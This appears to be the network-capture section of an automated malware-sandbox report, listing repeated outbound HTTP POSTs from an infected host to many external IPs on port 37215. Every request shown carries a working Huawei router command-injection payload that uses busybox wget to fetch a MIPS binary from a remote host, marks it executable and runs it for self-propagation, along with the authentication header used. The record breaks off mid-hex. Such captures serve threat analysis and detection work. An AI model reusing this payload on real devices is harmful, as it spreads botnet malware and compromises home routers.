                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1430192.168.2.1537172197.119.186.9637215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:05.855462074 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1431192.168.2.1540252197.82.244.8037215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:05.855479002 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1432192.168.2.1556968143.244.146.5237215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:05.855606079 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1433192.168.2.1543062155.76.222.23737215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:05.855671883 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1434192.168.2.153969241.71.109.21537215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:05.855694056 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1435192.168.2.1550720157.35.111.14737215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:05.855751991 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1436192.168.2.1537850157.48.225.7837215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:05.855767012 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1437192.168.2.1547616197.248.16.10737215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:05.855787992 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1438192.168.2.1550318157.115.69.4837215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:05.859709978 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1439192.168.2.155880641.214.65.13337215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:05.860429049 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 